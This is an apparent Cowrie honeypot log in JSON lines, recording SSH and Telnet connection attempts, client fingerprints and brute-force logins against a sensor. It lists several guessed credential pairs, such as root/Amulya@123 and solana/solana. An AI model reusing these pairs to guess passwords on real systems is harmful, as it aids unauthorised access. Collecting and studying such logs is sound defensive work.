{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":33544,"dst_ip":"1.2.3.4","dst_port":22,"session":"3229c34357b1","protocol":"ssh","message":"New connection: 45.88.8.215:33544 (1.2.3.4:22) [session: 3229c34357b1]","sensor":"my-vps","timestamp":"2025-08-24T17:50:12.162477Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T17:50:12.459728Z","src_ip":"45.88.8.215","session":"3229c34357b1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T17:50:12.461206Z","src_ip":"45.88.8.215","session":"3229c34357b1"}
{"eventid":"cowrie.login.success","username":"root","password":"Amulya@123","message":"login attempt [root/Amulya@123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T17:50:15.280719Z","src_ip":"45.88.8.215","session":"3229c34357b1"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T17:50:16.004485Z","src_ip":"45.88.8.215","session":"3229c34357b1"}
{"eventid":"cowrie.session.connect","src_ip":"142.93.95.65","src_port":51376,"dst_ip":"1.2.3.4","dst_port":22,"session":"b82a2e56d4c0","protocol":"ssh","message":"New connection: 142.93.95.65:51376 (1.2.3.4:22) [session: b82a2e56d4c0]","sensor":"my-vps","timestamp":"2025-08-24T17:52:46.293207Z"}
{"eventid":"cowrie.client.version","version":"\u0000\u0000\u0004T","message":"Remote SSH version: \u0000\u0000\u0004T","sensor":"my-vps","timestamp":"2025-08-24T17:52:46.294296Z","src_ip":"142.93.95.65","session":"b82a2e56d4c0"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T17:52:46.294983Z","src_ip":"142.93.95.65","session":"b82a2e56d4c0"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55424,"dst_ip":"1.2.3.4","dst_port":22,"session":"d34f09ca3036","protocol":"ssh","message":"New connection: 217.72.205.35:55424 (1.2.3.4:22) [session: d34f09ca3036]","sensor":"my-vps","timestamp":"2025-08-24T17:53:44.149325Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T17:53:44.152981Z","src_ip":"217.72.205.35","session":"d34f09ca3036"}
{"eventid":"cowrie.session.connect","src_ip":"211.46.214.137","src_port":47138,"dst_ip":"1.2.3.4","dst_port":23,"session":"4cb43471f13a","protocol":"telnet","message":"New connection: 211.46.214.137:47138 (1.2.3.4:23) [session: 4cb43471f13a]","sensor":"my-vps","timestamp":"2025-08-24T17:58:47.012541Z"}
{"eventid":"cowrie.session.closed","duration":31.425182819366455,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-24T17:59:18.437645Z","src_ip":"211.46.214.137","session":"4cb43471f13a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64780,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffdd711d9b6d","protocol":"ssh","message":"New connection: 217.72.205.35:64780 (1.2.3.4:22) [session: ffdd711d9b6d]","sensor":"my-vps","timestamp":"2025-08-24T18:00:34.130502Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:00:34.131747Z","src_ip":"217.72.205.35","session":"ffdd711d9b6d"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":59246,"dst_ip":"1.2.3.4","dst_port":22,"session":"557c9203c29a","protocol":"ssh","message":"New connection: 45.88.8.186:59246 (1.2.3.4:22) [session: 557c9203c29a]","sensor":"my-vps","timestamp":"2025-08-24T18:03:04.868448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T18:03:05.358013Z","src_ip":"45.88.8.186","session":"557c9203c29a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T18:03:05.358882Z","src_ip":"45.88.8.186","session":"557c9203c29a"}
{"eventid":"cowrie.login.success","username":"root","password":"11","message":"login attempt [root/11] succeeded","sensor":"my-vps","timestamp":"2025-08-24T18:03:07.495273Z","src_ip":"45.88.8.186","session":"557c9203c29a"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:03:08.727336Z","src_ip":"45.88.8.186","session":"557c9203c29a"}
{"eventid":"cowrie.session.connect","src_ip":"185.247.137.100","src_port":40427,"dst_ip":"1.2.3.4","dst_port":22,"session":"f01a4bf7e63d","protocol":"ssh","message":"New connection: 185.247.137.100:40427 (1.2.3.4:22) [session: f01a4bf7e63d]","sensor":"my-vps","timestamp":"2025-08-24T18:05:29.401577Z"}
{"eventid":"cowrie.session.connect","src_ip":"162.142.125.37","src_port":53848,"dst_ip":"1.2.3.4","dst_port":23,"session":"db9afb84586c","protocol":"telnet","message":"New connection: 162.142.125.37:53848 (1.2.3.4:23) [session: db9afb84586c]","sensor":"my-vps","timestamp":"2025-08-24T18:05:29.436758Z"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:05:31.401797Z","src_ip":"185.247.137.100","session":"f01a4bf7e63d"}
{"eventid":"cowrie.session.connect","src_ip":"185.247.137.100","src_port":42741,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c03133cae63","protocol":"ssh","message":"New connection: 185.247.137.100:42741 (1.2.3.4:22) [session: 1c03133cae63]","sensor":"my-vps","timestamp":"2025-08-24T18:05:31.424327Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T18:05:31.425213Z","src_ip":"185.247.137.100","session":"1c03133cae63"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-24T18:05:31.449368Z","src_ip":"185.247.137.100","session":"1c03133cae63"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:05:31.474554Z","src_ip":"185.247.137.100","session":"1c03133cae63"}
{"eventid":"cowrie.session.closed","duration":15.94076156616211,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:05:45.377434Z","src_ip":"162.142.125.37","session":"db9afb84586c"}
{"eventid":"cowrie.session.connect","src_ip":"162.142.125.37","src_port":45830,"dst_ip":"1.2.3.4","dst_port":23,"session":"15f964753974","protocol":"telnet","message":"New connection: 162.142.125.37:45830 (1.2.3.4:23) [session: 15f964753974]","sensor":"my-vps","timestamp":"2025-08-24T18:05:51.656067Z"}
{"eventid":"cowrie.session.closed","duration":3.684901237487793,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:05:55.340895Z","src_ip":"162.142.125.37","session":"15f964753974"}
{"eventid":"cowrie.session.connect","src_ip":"162.142.125.37","src_port":53640,"dst_ip":"1.2.3.4","dst_port":23,"session":"f8268ddc1e49","protocol":"telnet","message":"New connection: 162.142.125.37:53640 (1.2.3.4:23) [session: f8268ddc1e49]","sensor":"my-vps","timestamp":"2025-08-24T18:05:59.826043Z"}
{"eventid":"cowrie.session.closed","duration":10.593189239501953,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:06:10.419157Z","src_ip":"162.142.125.37","session":"f8268ddc1e49"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62446,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab2cb4974fc6","protocol":"ssh","message":"New connection: 217.72.205.35:62446 (1.2.3.4:22) [session: ab2cb4974fc6]","sensor":"my-vps","timestamp":"2025-08-24T18:07:07.718956Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:07:07.720117Z","src_ip":"217.72.205.35","session":"ab2cb4974fc6"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.71","src_port":38350,"dst_ip":"1.2.3.4","dst_port":22,"session":"38911629cefe","protocol":"ssh","message":"New connection: 92.118.39.71:38350 (1.2.3.4:22) [session: 38911629cefe]","sensor":"my-vps","timestamp":"2025-08-24T18:08:16.042463Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:08:16.073927Z","src_ip":"92.118.39.71","session":"38911629cefe"}
{"eventid":"cowrie.session.connect","src_ip":"192.155.90.220","src_port":19234,"dst_ip":"1.2.3.4","dst_port":22,"session":"bafb1ee836da","protocol":"ssh","message":"New connection: 192.155.90.220:19234 (1.2.3.4:22) [session: bafb1ee836da]","sensor":"my-vps","timestamp":"2025-08-24T18:09:49.814024Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T18:09:49.988304Z","src_ip":"192.155.90.220","session":"bafb1ee836da"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-24T18:09:49.988946Z","src_ip":"192.155.90.220","session":"bafb1ee836da"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:09:50.596662Z","src_ip":"192.155.90.220","session":"bafb1ee836da"}
{"eventid":"cowrie.session.connect","src_ip":"192.155.90.220","src_port":19236,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9aa909c1b4c","protocol":"ssh","message":"New connection: 192.155.90.220:19236 (1.2.3.4:22) [session: a9aa909c1b4c]","sensor":"my-vps","timestamp":"2025-08-24T18:09:50.699415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T18:09:50.839896Z","src_ip":"192.155.90.220","session":"a9aa909c1b4c"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-24T18:09:50.840819Z","src_ip":"192.155.90.220","session":"a9aa909c1b4c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:09:51.260337Z","src_ip":"192.155.90.220","session":"a9aa909c1b4c"}
{"eventid":"cowrie.session.connect","src_ip":"192.155.90.220","src_port":19246,"dst_ip":"1.2.3.4","dst_port":22,"session":"6af1527d767e","protocol":"ssh","message":"New connection: 192.155.90.220:19246 (1.2.3.4:22) [session: 6af1527d767e]","sensor":"my-vps","timestamp":"2025-08-24T18:09:51.362981Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T18:09:51.546415Z","src_ip":"192.155.90.220","session":"6af1527d767e"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-24T18:09:51.547162Z","src_ip":"192.155.90.220","session":"6af1527d767e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:09:52.053512Z","src_ip":"192.155.90.220","session":"6af1527d767e"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.71","src_port":44894,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2e9c1b9366b","protocol":"ssh","message":"New connection: 92.118.39.71:44894 (1.2.3.4:22) [session: e2e9c1b9366b]","sensor":"my-vps","timestamp":"2025-08-24T18:13:47.882780Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T18:13:47.883940Z","src_ip":"92.118.39.71","session":"e2e9c1b9366b"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-24T18:13:47.913029Z","src_ip":"92.118.39.71","session":"e2e9c1b9366b"}
{"eventid":"cowrie.login.failed","username":"solana","password":"solana","message":"login attempt [solana/solana] failed","sensor":"my-vps","timestamp":"2025-08-24T18:13:48.034324Z","src_ip":"92.118.39.71","session":"e2e9c1b9366b"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:13:49.067472Z","src_ip":"92.118.39.71","session":"e2e9c1b9366b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62724,"dst_ip":"1.2.3.4","dst_port":22,"session":"21680256f7b9","protocol":"ssh","message":"New connection: 217.72.205.35:62724 (1.2.3.4:22) [session: 21680256f7b9]","sensor":"my-vps","timestamp":"2025-08-24T18:14:01.444865Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:14:01.446141Z","src_ip":"217.72.205.35","session":"21680256f7b9"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":33920,"dst_ip":"1.2.3.4","dst_port":22,"session":"f64d0a424524","protocol":"ssh","message":"New connection: 45.88.8.215:33920 (1.2.3.4:22) [session: f64d0a424524]","sensor":"my-vps","timestamp":"2025-08-24T18:15:53.542350Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T18:15:54.488126Z","src_ip":"45.88.8.215","session":"f64d0a424524"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T18:15:54.488796Z","src_ip":"45.88.8.215","session":"f64d0a424524"}
{"eventid":"cowrie.login.success","username":"root","password":"Anshul@123","message":"login attempt [root/Anshul@123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T18:15:56.265177Z","src_ip":"45.88.8.215","session":"f64d0a424524"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:15:56.821246Z","src_ip":"45.88.8.215","session":"f64d0a424524"}
{"eventid":"cowrie.session.connect","src_ip":"222.133.65.137","src_port":58497,"dst_ip":"1.2.3.4","dst_port":23,"session":"e4007022e1d7","protocol":"telnet","message":"New connection: 222.133.65.137:58497 (1.2.3.4:23) [session: e4007022e1d7]","sensor":"my-vps","timestamp":"2025-08-24T18:17:39.864169Z"}
{"eventid":"cowrie.session.closed","duration":14.80675482749939,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:17:54.670851Z","src_ip":"222.133.65.137","session":"e4007022e1d7"}
{"eventid":"cowrie.session.connect","src_ip":"59.24.77.119","src_port":36084,"dst_ip":"1.2.3.4","dst_port":23,"session":"ae0ff5a3cf33","protocol":"telnet","message":"New connection: 59.24.77.119:36084 (1.2.3.4:23) [session: ae0ff5a3cf33]","sensor":"my-vps","timestamp":"2025-08-24T18:18:17.376867Z"}
{"eventid":"cowrie.session.closed","duration":30.507569789886475,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:18:47.884368Z","src_ip":"59.24.77.119","session":"ae0ff5a3cf33"}
{"eventid":"cowrie.session.connect","src_ip":"213.55.85.202","src_port":2525,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbee9c46b767","protocol":"ssh","message":"New connection: 213.55.85.202:2525 (1.2.3.4:22) [session: bbee9c46b767]","sensor":"my-vps","timestamp":"2025-08-24T18:18:58.275490Z"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:18:58.671072Z","src_ip":"213.55.85.202","session":"bbee9c46b767"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.71","src_port":50654,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbbcdaea10e2","protocol":"ssh","message":"New connection: 92.118.39.71:50654 (1.2.3.4:22) [session: cbbcdaea10e2]","sensor":"my-vps","timestamp":"2025-08-24T18:20:17.749213Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T18:20:17.750270Z","src_ip":"92.118.39.71","session":"cbbcdaea10e2"}
